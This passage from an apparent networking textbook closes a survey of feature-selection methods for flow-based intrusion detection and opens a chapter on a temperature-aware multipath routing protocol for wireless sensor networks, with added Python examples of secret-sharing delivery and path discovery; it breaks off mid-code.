issues to be addressed properly in classifying the data.

Not all features in a dataset necessarily lead to improved IDS
performance. Hence, preprocessing the dataset before going to the
detection phase plays an important role. In the preprocessing phase, feature
selection is an important stage. Feature selection is the process of select- 
ing the most important features applicable to a specific attack or malicious 
conduct. In machine learning, redundant or noisy data make it difficult 
to discover meaningful patterns from the dataset. Feature selection, also 
known as attribute selection, helps in many ways to improve performance 
and generate better results [24]. 

Gayatri et al. [17] used a feature reduction approach for the flow-based 
IDS using the J-Rip classification algorithm on CICIDS2017 datasets. The 
actual dataset has 86 features, which were reduced to 18 features for appli- 
cation-layer DDoS attacks. This reduced 18 feature set provides good accu- 
racy (99.93%) compared with all 86 features (99.91%). These reductions 
in feature size also reduced the model built-up time from 4.17 seconds to 
0.38 seconds. 

Ammar Alazab et al. [25] mentioned that many researchers do not
understand the importance of feature selection before applying the
classifier. However, it has now been shown through many studies that
using feature selection before classification improves classifier
performance while reducing the resources required. For a
multi-classification approach, feature selection plays an important
role. Abuadlla Yousef et al. [26] presented a two-stage neural
network-based flow IDS. The first stage gives the important features
for malicious traffic classification (feature preparation module).
These reduced features play a key role in classifying traffic into
normal and abnormal. The conclusion of this work is that feature
selection assists in improving IDS performance.

Mahendra Prasad et al. [27] presented a novel intelligent system of 
feature selection by combining a rough set with Bayes Theorem to build 
an intrusion detection system. In this system, core features are identified 
and ranked based on estimated probabilities. These estimated probabil- 
ities help to remove redundant features in the training phase to reduce 
the training complexity. Here the rough set theory is helpful to distinguish 
uncertain information. Here records are divided into three categories,
namely normal, intermediary, and abnormal. Bayes theorem is applied to
intermediary or unseen samples to make a firm decision. The CICIDS2017
dataset was used to evaluate the system. The proposed system's feature
count is reduced to 40, providing an accuracy of 97.95% with precision
and recall of 96.37%. The system's main drawback was that manual
intervention was needed to decide the range of estimated probabilities
of relevant and irrelevant features. The preprocessing work was also
done manually. Tanya Garg et al. [28] attempted to reduce the number
of features by using ten different classification algorithms to obtain
the features and then ranking the features according to their
importance. After this, the 15 top features are selected to get better
performance. These features are extracted using the Boolean AND
operator over the top six classification algorithms. The work in [29]
showed that system performance is also reduced by considering
redundant features, e.g., attack detection accuracy decreases with an
increase in overload.

Chaouki and Saoussen [30] proposed a wrapper approach-based feature 
selection method. Genetic algorithm (GA) and logistic regression (LR) are 
used in the wrapper approach for the most relevant feature selection. A 
genetic algorithm is used as a search strategy for representing the possible 
feature subset. Moreover, logistic regression is used as a predictor in the 
wrapper. The authors used the KDD99 dataset and the UNSW-NB15 data- 
set for experimentation. The most relevant feature set accuracy is tested 
using three decision tree classifiers, C4.5, RandomForest, and NBTree. The 
proposed approach provides high classification accuracy and lowers the 
false alarm rate. The proposed approach showed a good detection rate for 
Denial of Service attack with 99.98%. 

Sumaiya et al. [31] suggested an IDS model for classification based on 
chi-square feature selection and multi-class SVM. The authors suggest a 
chi-square feature selection method based on rank. The NSL-KDD dataset 
was used to test the proposed method. A mixture of discrete and contin- 
uous features is selected using the proposed feature selection process. The 
proposed model achieves high detection rates and low false alarm rates 
with selected features due to the parameter tuning technique, optimiz- 
ing gamma, and over-fitting SVM parameters. The proposed model also 
decreased training and testing time significantly. 

Akashdeep et al. [32] proposed a feature reduction method for IDS to 
improve performance. The proposed system used information gain and 
correlation methods for ranking features. The proposed system combined 
features obtained from information gain and correlation to differentiate 
useful and useless features. The KDD99 dataset is used for training and 
testing the proposed system. The intrusion detection system is imple- 
mented using a neural network. The proposed Intrusion Detection System 
with a reduced feature set showed better performance, increased detection 
rate, and reduced false alarm rate than the system without feature reduc- 
tion. The proposed model showed a 99.93% detection rate for DoS attacks. 

Madbouly et al. [33] proposed lightweight IDS with a feature selection 
method. The proposed system used the KDD99 dataset. The proposed 
system used a correlation-based feature subset selection (CFS)
evaluator with seven different search methods: Best first,
Evolutionary search, Rank search (gain ratio), Rank search (info
gain), PSO search, Greedy stepwise, and Tabu search. The proposed
method selected the 12 most relevant features from 41 features. With
12 features, the proposed model reported the same performance (99.95%)
as with 41 features. The proposed
system achieved the same detection accuracy with a higher True Positive 
Rate, lower False Positive Rate, and lower False Negative Rate. 

ZHANG Xue-qin et al. [34] demonstrated an IDS based on feature
selection and SVM, in which feature selection is made on the basis of
the Fisher Score. They used the SVM as a classifier. The Fisher Score
is combined with the SVM to choose the significant features. They took
three parameters into account: Precision, Detection Rate, and False
Positive Rate. They selected features for the blended attack mode and
the single attack mode, and out of 41 features, 29 features are
significant. For the assessment, they used the KDD Cup 99 dataset for
intrusion detection. In this dataset, attacks such as DoS, Probe, U2R,
R2L, and so forth are available.

Shang Lei [35] introduced a feature selection strategy based on
Information Gain and Genetic Algorithm, in which the text
classification feature selection technique relies on information gain
together with the frequency of items. The author demonstrated that
this feature selection strategy could address the problem of text
classification.

Preeti Aggarwala and Sudhir Kumar Sharma [36] performed a detailed
study on the NSL KDD data set, with its attributes categorized into
four classes: Basic, Traffic, Content, and Host. They analyzed the
results for the Detection Rate and False Alarm Rate of the IDS. NSL
KDD has 42 attributes classified under the four classes: Basic has
nine attributes, Content has 13 attributes, Traffic has nine
attributes, and Host has ten attributes. The KDD data set was
classified, and 15 variants were created by combining all four
classes. The Random Tree classification algorithm and the WEKA tool
were used for the analysis. The results showed that the Basic class
had a high Detection Rate (81%), whereas the Host class had a low
False Rate (8.5%).

Vandna and Anurag [37] proposed the implementation of the decision 
tree algorithm with K-means on IDS. The authors evaluated the perfor- 
mance of two decision tree algorithms J48 and ID3. The attribute reduc- 
tion was performed on the NSL-KDD dataset. Out of 41 original attributes, 
only nine attributes were selected in preprocessing, and classification algo- 
rithms are implemented. Dimension reduction played an important role in 
the performance evaluation of J48 and ID3 algorithms. The result showed 
J48 performed better for reduced dimensionalities. 

The value of using feature selection methods in IDS was suggested by 
Krishan et al. [38]. One of the most challenging aspects of developing effec- 
tive IDSs is dealing with large amounts of data with numerous features. The 
authors proposed several feature selection methods and graded them using 
InfoGain, GainRatio, RELIEF OneR, etc. The authors used the J48 classi- 
fier to assess the performance of the best algorithms by combining features 
from the best algorithms. KDDCup99 data set was examined to evaluate 
proposed techniques. OneR and RELIEF, two newly proposed feature 
selection algorithms, are compared to existing feature selection algorithms 
such as SVM, OneR, Chi-square, Relief, GainRatio, Information Gain, and 
others in order to choose the best features. Their findings revealed that the 
proposed FS approach decreases training time while increasing accuracy. 
The proposed FS algorithm reduced 70.73% of the feature dimension space 
and roughly 60% of the training time, increasing classification accuracy 
from 61.39% to 66.80%. 

The author of this article used Genetic Algorithms (GA) with Principal 
Component Analysis (PCA) for feature selections [39]. Here PCA is used 
only for feature transformation purposes. After this, normalized features 
are fed to GA for feature selection. The Decision Tree (DST) is used as 
a classifier for this experimentation. This hybrid model of PCA-GA-DST 
reduced the CICIDS2017 dataset’s features to 40 features with an accuracy 
of 99.53%. In another work [24], features of the CICIDS2017 dataset
are selected based on their classification performance. Here one
feature is deleted from the dataset at a time, and the accuracy, model
build-up time, and test time are recorded. If deletion of the feature
causes a reduction in accuracy and an increase in the build time and
test time, that feature is considered important. Using this approach,
15 features are identified as important, which give good accuracy
compared to the accuracy with all features.


5.7 Challenges and Future Scope 


The issue with IDS is that it must cope with ever-faster network speeds. It 
is difficult for packet-based IDS to keep up with such fast network traffic. 
The flow-based IDS can solve this problem of packet-based IDS. Increasing 
alert confidence, reducing false alarms, and reducing resource consump- 
tion are still open issues for the IDS researchers. 

Only some portion of the current research work has focused on flow-
based IDS, and still, many researchers are working on packet-based IDS 
despite understanding the need for flow-based IDS. Hence significantly less 
information is available about meaningful flow features and their capacity 
to classify network traffic. In the case of flow-based IDS, some researchers 
do not understand the importance of data cleaning. If we correctly understand 
our data, we can reduce some of the features before actual feature 
selection starts. In the CICIDS2017 dataset [40], features like source IP address, 
SourcePortNumber, DestinationIP, and FlowID are network-specific features, and 
such features should be removed beforehand in the data cleaning process. While 
working with feature selection in IDS, each researcher has used a different 
portion of different datasets. However, when comparing the results, datasets 
need to be the same across all the works. The choice of feature selection 
algorithms must consider simplicity, feature reduction capacity, stability, 
scalability, accuracy, storage requirement, and the algorithm's computational 
efficiency. The tradeoff between feature selection and feature extraction 
also needs to be taken care of. With feature selection, we select only a 
subset of features. Hence it is possible that some of the information 
may be lost. 

Nevertheless, feature extractions take care of this. The choice between 
feature selection and feature extraction depends on the domain of the 
application under consideration. The use of bio-inspired algorithms for 
feature selections has increased a lot in the last few years. These algorithms 
are categorized under three groups, viz. evolutionary, ecology-based, and 
swarm-based. With a bio-inspired algorithm, one may be good at accuracy, 
but the computational time required is more. Also, setting up algorithmic 
parameters like the number of generations and the number of iterations 
takes time. The referred literature shows that anticipating an ideal number 
of features to enhance IDS accuracy and decrease training time complexity 
continues to be an open issue. Data correlation is the future of IDS. The 
future IDS will deliver results by analyzing input from various traces. 


5.8 Conclusions 


There is a rapid advancement in network technology, which is manifested 
in higher-speed networks. There is also a rise in the number of internet 
users. All this results in a huge amount of data flowing through a network 
(it can be considered big data), which burdens the IDS. The packet-based 
approach compares each and every packet so packet-based IDS cannot be 
used in high-speed networks. In this scenario, flow-based IDS is the prominent 
solution to this problem. The use of the feature selection technique 
with flow-based IDS helps optimize resource usage with improved 
accuracy. In this study, the authors have also gone through various feature 
selection approaches used for flow-based IDS. This study showed how the 
reduced number of features could significantly save computational time 
and storage of a system with better accuracy than earlier. 

Abstract 

Wireless Sensor Network (WSN) is one of the emerging technologies in the 21st 
century due to its growing demand in automation. WSNs are organized in a large 
environmental area and there are more chances for the sensor nodes to get affected 
because of external temperature. As the environmental temperature rises, the life- 
time, quality of service and temperature of sensor nodes are easily influenced. Thus 
Environmental Aware Thermal (EAT) routing protocol is introduced to minimize 
the issue. In this protocol, the incoming data signals are assigned with normal, 
abnormal and critical priority levels. It consists of three potential fields such as 
environment, energy and quality of service. The routing path is chosen in such a 
way that the critical data reaches its destination with minimum delay. Therefore, 
the path is selected depending on surrounding temperature, threshold level and 
residual energy. The network performance was analyzed in three different cases: 1, 
2 and 3. The total amount of power consumption, temperature variation, delay and 
lifetime of sensor node in all three cases are inferred. 

6.1 Introduction 


Generally, a Wireless Sensor Network (WSN) is a distributed network 
with many sensors. It is based on wireless technology and is used to col- 
lect information from external environments like forests, flooded regions, 
agricultural land, battlefields, etc. A WSN comprises numerous tiny sensors 
to monitor the area where it is located. The collected signals are 
forwarded to the destination through intermediate nodes. A path is estab- 
lished to transmit the data from source to destination. This path is known 
as a routing path and the protocols designed to carry out this function are 
referred to as routing protocol. A routing protocol uses a predefined set of 
rules and regulations to choose a shortest path to destination from multi- 
ple available paths. An efficient routing protocol will increase the efficiency 
of a system and therefore it is considered as the heart of the communica- 
tion networking system. The common protocols used in a WSN are given 
in Fig. 6.1. 


(i) Node centric routing: In this type of protocols the destina- 
tion is identified as numeric. 

(ii) Data centric routing: In this routing, the information 
obtained from the attributes are transmitted rather than 
receiving information from other nodes. 

(iii) Source initiated routing protocols: The source node adver- 
tises that it has data to send and routing path is initiated 
from source. 

(iv) Destination initiated routing protocols: In these protocols, 
the destination initiates the routing path. 


The categories of routing protocol are single and multipath routing protocol. 
Nowadays, multipath routing protocol is incorporated in wireless 
sensor networks to obtain good quality in data transmission. In the case 
of single node routing protocol, data loss between source and destination 
occurs if there is a fault in sensor node. Also, energy consumption and data 
failure rate are noticed as high in single path routing protocol. 

Fig. 6.1 Routing protocol used in wireless sensor network. 


6.1.1 Single Path Routing Protocol 


In single path routing protocol, the connection between 
source and destination is established using a single path. This protocol 
estimates link quality, and these links are used to determine the best optimum 
path in WSNs. Basically, this is one of the most supportive techniques 
utilized in single path routing to provide reliability [1]. All the nodes are 
connected to the node head as illustrated in Fig. 6.2. If a node wants to 
transmit the data to base station it first sends the data to the node head and 
from the node head it reaches the base station. 

Due to continuous data transmission, the node head generates more 
heat, and the communication path established to the base station is 
disconnected due to node head failure as shown in Fig. 6.3. Once the link 
fails, there is data loss and the data cannot reach the base station. It 
becomes a life-threatening problem in case of critical data transmission. 

In a single path routing approach, a route discovery can be carried out 
with minimum resource utilization and computational complexity but it 
results in reduced throughput [2]. Additionally, reduced flexibility obtained 
as a result of this approach may significantly degrade the performance of 
the network in critical situations. Limited power supply, physical 
damage and high dynamics in wireless links cause failure in the active path 
link. The data packet is not forwarded and thus an alternative routing path 
is found to transmit the data continuously, resulting in increased delay 
in data delivery and maximum overhead. Hence due to unreliability and 
resource constraint of wireless links, a single path routing protocol is not 
widely used in various applications [3] as it cannot meet the different 
performance requirement criteria in WSNs. 

Fig. 6.2 Single path communication protocol. 

Fig. 6.3 Communication failure due to node head heating. 


6.1.2 Multipath Routing Protocol 


The multipath routing protocols are used in different applications. They 
provide an alternative routing path if there is a link failure in the established 
multiple path connection between the source and the sink. The link path is 
established using hop count. Furthermore, in multihop WSNs the environmental 
factors, orientation, antenna shape, distance and radio interference 
vary during the entire lifetime of wireless sensor networks. All these factors 
affect the link quality between the sensor nodes [1]. Consider a network 
with multiple routing paths to reach the destination. A routing path 
established to transmit data from source to destination is as shown in Fig. 
6.4. Due to continuous data transmission, there is a node failure due to 
excess heat generation in the established routing path as depicted in Fig. 
6.5. Therefore, the communication between the source and destination is 
disconnected and data cannot reach the destination [4]. 

In multipath routing protocol the data are sent to the source and the 
source establishes a new routing path to the destination. Fig. 6.6 shows the 
reestablishment of connection to the destination through the next shortest 
route. The main advantage of utilizing multipath routing protocol is to 
maintain uniform traffic within the network, where the data are divided 
equally among all multiple paths. As a result, the energy consumption is 
also balanced. Moreover, it increases the reliability of the system by creating 
multiple copies of data packets and transmitting them to the destination. 

Fig. 6.4 Shortest path established between source and destination for data transmission. 

Fig. 6.5 Node failure in established routing path with data transmission loss. 

Fig. 6.6 Data transmission through an alternative path. 


6.1.3 Environmental Influence on WSN 


In wildlife monitoring applications, the performance of the network was 
observed on different days, at night and in the daytime, in different climatic 
conditions like summer and winter, especially in an outdoor environment. 
Thelen et al. [5] discussed the radio propagation through high humidity in 
a potato deployment field. The path loss exponent value was 4 irrespective 
of different growing seasons. The radio range diminishes to 10 m as the 
potato crop starts flowering. Thus, it is necessary to deploy sensor nodes 
at a distance of at most 10 m in precision agriculture applications and a 
microclimate is sensed during the entire growing season. The influence of 
the potato foliage is found to be 17 dB, as nodes are placed at a distance of 
15 m. G. Anastasi et al. [6] suggested that rain and fog affect the performance 
of WSN, especially in data transmission range and reception. The 
data transmission range of mica2/mica2dot sensor nodes is poor in the 
presence of rain or fog. Carlo Alberto Boano et al. [7] looked into the variations 
of link quality and data delivery performance under the influence of ambient 
temperature in low-power radio communications. The experimental result 
highlights that the communication between sensor nodes gets affected due 
to temperature and thus minimum transmission power is required at low 
temperature. 


6.2 Motivation Behind the Work 


A wireless sensor network plays a vital role in many applications such 
as health care, precision agriculture, environmental surveillance, military, 
etc. A WSN must support a certain degree of reliability, energy and 
delay bound for data transportation to be utilized in these applications. 
Therefore, it is necessary to design and develop an energy-efficient protocol. 
Apart from these factors, environmental awareness is also an important 
factor that should be considered in multipath routing protocol design. 
Sensor nodes are low in cost and are deployed on a large scale. They are easily 
influenced by environmental factors like electromagnetic interference, 
vibration, temperature and humidity. Once the surrounding temperature 
increases, it degrades the performance of sensor nodes and an excessive rise 
in temperature may damage the sensor nodes. An extremely high humidity 
environmental condition minimizes the link quality and raises the probability 
of short-circuitry in sensor nodes. Similarly, strong electromagnetic 
interference increases the data loss rate. 

Thus the sensor nodes utilized in health care applications must with- 
stand the environmental characteristics and fluctuating channels. Besides, 
a communication protocol must be designed to maintain a bounded packet 
delivery rate (during critical stage of human) even though there is a drop in 
the established link. The sensor nodes deployed in the outdoor environment 
usually experience high fluctuation due to the variation in weather conditions. 
Thus the designed protocol must withstand variations in environmental 
conditions and channel fluctuations and ensure successful data delivery. If the 
designed routing protocol does not withstand the environmental changes 
and the data packets routed through a sensor node are affected by tem- 
perature once it crosses a heat zone, data delivery through this particular 
path is terminated. In case of environment-aware routing, if the routing 
path senses extreme temperature it adjusts to an alternate routing path to 
prevent data loss. 

6.3 Novelty of This Work 


Many researchers tried to incorporate the impact of environmental influence 
into the network’s performance. But only a few of them could find 
an appropriate and reliable result for the influences of different environmental 
conditions. However, work on the main parameter degrading the network 
lifetime and quality of service is very scanty in the literature and only very 
few environmental parameters like fog, moisture, humidity, and reflecting 
angle were considered. This work aims to develop an invulnerable routing 
protocol which resists environmental impact. Thus an Environmental 
Aware Thermal (EAT) Routing Protocol has been developed. It consists of 
potential fields like energy, environment and quality of service. The energy 
field ensures that the sensor nodes select neighbor nodes with more energy 
as relay nodes. The environmental field makes sure that the estimated rout- 
ing path finds an alternative routing path as the sensor node temperature 
increases beyond the threshold limit. The quality of service field makes the 
data reach the destination successfully from the source. The routing path 
is estimated once the above-mentioned potential fields are satisfied. The 
major contributions of EAT protocol are summarized as follows. 


1. Improved routing possibilities under critical temperature zone: 
Based on the acquired data from environment, the EAT 
routing protocols can identify an additional routing path to 
avoid the critical temperature zone. 

2. QoS field: To improve the quality of service, the data are 
assigned with three different priorities (normal, abnormal 
and critical). This protocol ensures that the critical data will 
reach the destination node without any delay. 

3. Energy field: This protocol measures the available remaining 
energy within the network. If a node wants to choose an 
alternative path due to a high temperature zone, then a routing 
path with high energy nodes is selected. Similarly, the relay 
node with high energy is selected for long-distance data 
transmission. 


The remainder of this chapter is organized as follows: conventional 
protocols on node disjoint, partially disjoint protocols and temperature 
influence on different applications are reviewed in Section 6.4. In Section 
6.5, the implementation of Environmental Aware Thermal (EAT) Routing 
Protocol, assumption and flow chart are illustrated. Section 6.6 highlights the 
simulation parameters utilized. Section 6.7 discusses the results obtained 
from simulation and analyzes the environmental impact on a WSN. Finally, 
in Section 6.8 the conclusion is presented. 


6.4 Related Works 


The multipath routing protocols are designed to provide reliability and 
energy efficiency in a WSN. The protocols are classified into two types 
based on node path disjointness such as node disjoint and partially disjoint. 

In node disjoint protocol, there is no single common node in any dis- 
covered routing paths. In case of node failure, data transmission through 
that particular route is interrupted. This protocol guarantees that other 
constructed paths are not affected. The different node disjoint protocols 
are as follows: In N-to-1 multipath protocol [8] the routes are updated 
periodically at the end of discovery process or based on the demand from 
base station. A hybrid multipath approach is introduced for reliable and 
secured data collection. The information at the source is split into multiple 
data using secret sharing scheme. The divided data travels along the mul- 
tiple path for concurrent delivery. The reliability of packet is increased due 
to an alternate path packet salvaging strategy. This protocol is resistant to 
collusive attack and link failure of nodes. HSPREAD [9] is an extension 
of N-to-1 multipath routing protocol. It is used to find the nodes being 
disjointed from BS in a single route discovery process, following which a 
hybrid multipath data collection approach was proposed. In this method 
an alternative routing path is determined for every individual packet and 
is combined with concurrent multipath dispersion to obtain concurrent 
route for end-to-end data collection. Additionally, this scheme improves 
the security of end-to-end data delivery by combining multipath data 
dispersion and secret sharing mechanism. The multipath route discovery 
operation is similar to N-to-1 multipath routing protocol. Hence energy 
efficiency is found to be a major drawback in this protocol. The authors in 
[10] proposed DCHT protocol based on node disjoint multipath routing 
protocol. In this scheme, multipath routing path is established by direct 
diffusion process. This process strengthens the multiple path by provid- 
ing minimum latency and high quality link. The quality of any established 
path is judged by interference strength and data transmission latency. As 
the interference strength is dynamic in WSN, more network resources are 
required for routing in DCHT. Thus the disjoint paths with less interference 
and path cost are selected. In the Efficient and collision aware 
node-disjoint multipath routing algorithm (EECA) [11], two collision-free 
routing paths are estimated based on node position information. These two 
paths are established using power and constrained adjusted flooding mechanism. 
The data are transmitted with minimum power. The EECA protocol 
is limited within the neighbor nodes in the discovered route. Additionally, 
collision between the established two routing paths is achieved utilizing 
the broadcast nature of wireless communication. However, the multipath 
interference is reduced in routing protocol. In Geographic node-disjoint 
path routing protocol (GNPR) [12], two routing schemes based on direc- 
tion and distance are established. These metric schemes are incorporated 
in greedy routing (GR) and compass routing (CR). The data packets are 
forwarded to the neighboring nodes with a smallest angle to reach the 
destination in CR. Similarly, the node transmits data packet to neighbor 
present near the destination in the space in GR. It performs better in terms 
of delay. In Pairwise directional geographical routing protocol (PWDGR) 
[13] the pairwise nodes are selected which are 360° around the sink. The 
routes are established in the following manner: source-pairwise-sink. This 
connection provides a balanced traffic in the network and avoids hot spot 
issue by uniformly selecting the nodes for routing path. The GPS module 
can be integrated into sensor nodes in PWDGR to find the location but the 
cost becomes high in large-scale deployment. In Minimum Energy Cost 
Aggregation Tree (MCEAT) algorithm [14], multipath node disjoint prob- 
lem is considered as Steiner tree problem and the solution is determined 
through genetic algorithm. The main objectives of these optimization algo- 
rithms are reliability, transmission delay and energy. In this algorithm two 
factors are considered, one with relay node and other without relay node. 
The solution for without relay node problem is obtained using 2 approx- 
imation algorithm and for networks with relay node is determined using 
O(1) approximation algorithm. Since the Steiner tree problem is NP hard, 
this approach is efficient only for small-scale deployment areas. 
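
The secret-sharing multipath dispersion described above for the N-to-1 and HSPREAD schemes can be sketched as follows; this is an added example, not code from the cited papers. Shamir's (T, N) threshold scheme over a prime field is an assumption (the text names no specific scheme), as are the function names and the constructed sample payload.

```python
"""(T, N) threshold secret sharing across node-disjoint paths (added example)."""
import secrets

PRIME = 2**127 - 1   # Mersenne prime; field for the polynomial arithmetic
BLOCK = 15           # bytes per block, so every block value is < PRIME
SAMPLE = b"node17 temp=84C prio=critical"   # constructed sensor reading


def _eval_poly(coeffs, x):
    """Evaluate a polynomial (lowest coefficient first) at x, mod PRIME."""
    acc = 0
    for c in reversed(coeffs):
        acc = (acc * x + c) % PRIME
    return acc


def split(payload: bytes, t: int, n: int):
    """Split payload into n shares, any t of which rebuild it.

    Returns {path_id: [y value per block]}; path_id is also the x coordinate.
    Fewer than t shares are points on a degree t-1 polynomial and are
    consistent with every possible block value, so relays that collude on
    fewer than t paths learn nothing about the reading.
    """
    if not 1 <= t <= n:
        raise ValueError("need 1 <= t <= n")
    data = len(payload).to_bytes(2, "big") + payload   # length prefix
    shares = {x: [] for x in range(1, n + 1)}
    for i in range(0, len(data), BLOCK):
        block = data[i:i + BLOCK].ljust(BLOCK, b"\0")
        secret = int.from_bytes(block, "big")
        # Fresh random polynomial per block with f(0) = secret.
        coeffs = [secret] + [secrets.randbelow(PRIME) for _ in range(t - 1)]
        for x in shares:
            shares[x].append(_eval_poly(coeffs, x))
    return shares


def _interpolate_at_zero(points):
    """Lagrange interpolation of f(0) from (x, y) points over GF(PRIME)."""
    total = 0
    for xi, yi in points:
        num, den = 1, 1
        for xj, _ in points:
            if xj != xi:
                num = (num * -xj) % PRIME
                den = (den * (xi - xj)) % PRIME
        total = (total + yi * num * pow(den, -1, PRIME)) % PRIME
    return total


def combine(received, t):
    """Rebuild the payload at the sink from the shares that arrived.

    No integrity check is done here: a tampered share yields wrong output,
    so a real deployment would also authenticate each share.
    """
    if len(received) < t:
        raise ValueError("fewer than t shares arrived")
    chosen = sorted(received.items())[:t]
    data = b""
    for b in range(len(chosen[0][1])):
        value = _interpolate_at_zero([(x, ys[b]) for x, ys in chosen])
        data += value.to_bytes(BLOCK, "big")
    length = int.from_bytes(data[:2], "big")
    return data[2:2 + length]


def deliver(payload, t, n, failed_paths):
    """Send one share per disjoint path, lose the shares on failed paths,
    and return the rebuilt payload, or None if too few shares arrived."""
    shares = split(payload, t, n)
    arrived = {x: ys for x, ys in shares.items() if x not in failed_paths}
    try:
        return combine(arrived, t)
    except ValueError:
        return None


if __name__ == "__main__":
    print(deliver(SAMPLE, 3, 5, {2, 4}))      # two of five paths fail
    print(deliver(SAMPLE, 3, 5, {1, 2, 4}))   # three fail: below threshold
```

With T = 3 and N = 5 the sink tolerates the loss of any two paths, while relays on any two paths together still hold too few shares to recover the reading.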

The node disjoint routing protocol provides several advantages such as 
reliability. This algorithm finds it difficult to estimate several paths between 
source and sink in case of sparse deployment. Besides, this protocol requires 
frequent updating of information about the neighboring nodes, resulting in 
larger routing overhead. Thus partially disjoint multipath routing protocols 
are formed. They are similar to the node disjoint protocol, but partially disjoint 
multipath routing can also incorporate multiple shared nodes, and a single 
node failure interrupts all the other alternate paths that include the failed node. 
The various partially disjoint multipath routing protocols are described below. 

Security Aware Ad hoc Routing protocol (SAR) [15] is the first partially 
disjoint multipath routing protocol. In this protocol the routing decisions 
are made by considering the following factors, namely QoS parameters, 
priority of data packets and energy conservation. This protocol utilizes 
a table driven multipath approach to provide fault tolerance, energy 
consumption and QoS parameters. SAR provides quality of protection to 
all the data packets flowing through this protocol. Thus the routing over- 
head maintenance is overwhelming. Reliable Information Forwarding 
(ReInForM) routing protocol [16] transmits multiple copies of data 
packets through multiple paths from source to sink with the desired 
reliability. Dynamic packet is created to minimize the number of paths 
required for reliability. This is done through topology and channel error 
rates. ReInForM utilizes all desired path with uniform and efficient load 
balancing. The routing mechanism implemented in this protocol is costly 
due to frequent information exchange of neighboring nodes. In State Free 
Gradient-Based Forwarding Protocol (SGF) [17], the sensor nodes do not 
maintain routing table in which the information about neighboring nodes 
or network topology is not maintained. Hence this protocol remains suitable 
for large networks. Instead of routing table, SGF constructs a cost field 
called gradient. This gradient directs each data packet to proper routing 
path. The entire gradient mechanism is maintained by data transmission 
with little overhead. To adapt to topology variations, the forwarder node 
is selected through distributed contention process from multiple nodes. 
This protocol provides less delay with increased packet delivery. Energy- 
Balanced Routing Protocol (EBRP) [18] approach is constructed by com- 
bining virtual potential field and the concepts of potential in physics. The 
virtual potential field consists of depth energy and residual energy. In this 
protocol the data are forwarded through the nodes with high residual 
energy. The routing loop problems are eliminated by using loop elimina- 
tion algorithm and basic algorithm. This algorithm improves energy bal- 
ance, increased network lifetime and throughput. 

In addition to the above routing protocol a few researchers have analyzed 
the impact of surrounding temperature in an environment with the follow- 
ing results. The area of monitoring on off-site region depends on the position 
of electronic nose which is a part of the WSN system [19]. The node located 
beyond the landfill region does not monitor continuously, but it acts as a sen- 
sor when activated at particular conditions, both inside and outside the land- 
fill are obtained. Additionally, a WSN is organized based on the energy aware 
approach to increase the lifetime of entire system with benefits in terms of 
cost and better advancements in monitoring structure. In this work [20] a 
heuristic algorithm is designed and reference architecture that aids the deci- 
sion of anomaly detection depends on the demands of agricultural environ- 
ments are utilized. The author had performed a preliminary evaluation and 
analyzed different anomaly detection algorithms in terms of scalability met- 
rics, execution time and accuracy. From the obtained results it was inferred 
that the power consumption is reduced by 18.59% and the temperature 
of the device is lessened by 15.94%. The obtained values are completely dependent 
on edge device characteristics and the application workload. The sensors are 
placed in different environments to collect various data such as humidity, 
light, temperature, etc. [21]. Though it is useful to collect different data, it is 
still a prominent issue to infer the impact of environmental conditions on 
data collection in terms of accuracy and prolonged network lifetime. Hence 
an optimized dictionary updating learning-based compressed data collec- 
tion algorithm (ODUL-CDC) is developed to degrade the influence of envi- 
ronmental noise on the accuracy of WSNs data collection and to increase the 
life time of sensor node. The main purpose of using the dictionary learning 
method is to get a sparse dictionary, which is obtained by learning from the 
training data. Henceforth the main purpose of introducing the self-coher- 
ence penalty term is to reduce the over fitting of the training data during the 
dictionary updating process. Before installation of sensor nodes, it is import- 
ant to determine the total cost required to complete the entire set up [22]. A 
sensor network is designed with an operating frequency of 920 MHz band 
to measure the quantities like atmospheric pressure, dust, temperature and 
relative humidity, etc. The system is developed based on LoRa networks and 
the above-mentioned parameters are measured in the actual environment of 
Kamihama campus at Mie University. From the results it is observed that the 
temporal and spatial characteristics of measured quantity are determined for 
proper positioning of end devices in LPWAN-based WSN. 

Thus from the above discussion it is clear that only a few studies were 
carried out by considering the impact of temperature on sensor nodes. But 
in routing protocol design the influence of temperature variations in the 
environment is not included. Hence due to low-cost implementation and 
large-scale deployment the effect of environmental factors on WSN can- 
not be neglected practically. Thus EAT routing protocols are designed to 
consider the influence of environmental temperature on performance of 
sensor nodes. 


6.5 Proposed Environmental Aware Thermal (EAT) 
Routing Protocol 


In EAT routing protocol, the environmental influence on a particular net- 
work and its effects are estimated. The effects are observed for lifetime, data 
delivery delay, device performance, and network efficiency during critical 
periods. Fig. 6.7 shows the operation of EAT protocol. 
Fig. 6.7 Environmental aware thermal (EAT) routing protocol. 

• In the initialization phase, source initiates the broadcast to 
gather information from intermediate nodes like hop distance, 
temperature and energy from source to destination. 

• The neighboring node starts calculating the temperature 
and remaining energy. If the temperature of the node is 
found to be less than the threshold value (Node_temp<Th_min), 
the packet is passed to the next intermediate node 
for further processing or else the data packets are discarded. 
Likewise, the remaining available energy is also calculated. 
If the node’s energy is high, then the packet is forwarded to 
the neighboring node. 

• If both temperature and energy conditions are satisfied, the 
node calculates the distance between source and destination. 
A connection is established through a path with minimum 
hop count. If the distance is too long, then the node 
will choose a relay node to reach the destination. 

• Once the connection is established, the sensor nodes are 
ready to transmit the packets to the destination. Before 
data transmission, the packets are categorized into normal, 
abnormal and critical priority levels. 

• After assigning priority, the protocol checks the surrounding 
temperature. If it is above the threshold value 
(Node_Etemp>Th_max), then the packets are retransmitted to 
source to choose an alternative path. Next, the node’s temperature 
is calculated. If temperature of sensor node is 
greater than the threshold value (Node_temp>Th_max), the 
sensor node forwards only critical data signals; otherwise all 
priority signals are transmitted. 
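
The steps above can be traced in a short simulation, added here as an example and not the authors' implementation. The numeric thresholds, the energy floor E_MIN, the function names and the five-node topology are assumptions; relay-node selection for long distances is left out.

```python
"""EAT-style path discovery and priority forwarding (added example)."""
from collections import deque
from dataclasses import dataclass, field

TH_MIN = 60.0   # assumed discovery threshold for Node_temp (deg C)
TH_MAX = 80.0   # assumed upper threshold for Node_temp / Node_Etemp (deg C)
E_MIN = 0.5     # assumed residual-energy floor (J); the text only says "high"


@dataclass
class Node:
    temp: float        # Node_temp: temperature of the node itself
    env_temp: float    # Node_Etemp: surrounding temperature
    energy: float      # residual energy
    neighbors: list = field(default_factory=list)


def discover_path(net, src, dst, avoid=frozenset()):
    """Initialization phase: breadth-first broadcast from src.

    An intermediate node relays the request only if Node_temp < TH_MIN and
    its energy is at least E_MIN. Breadth-first order makes the first path
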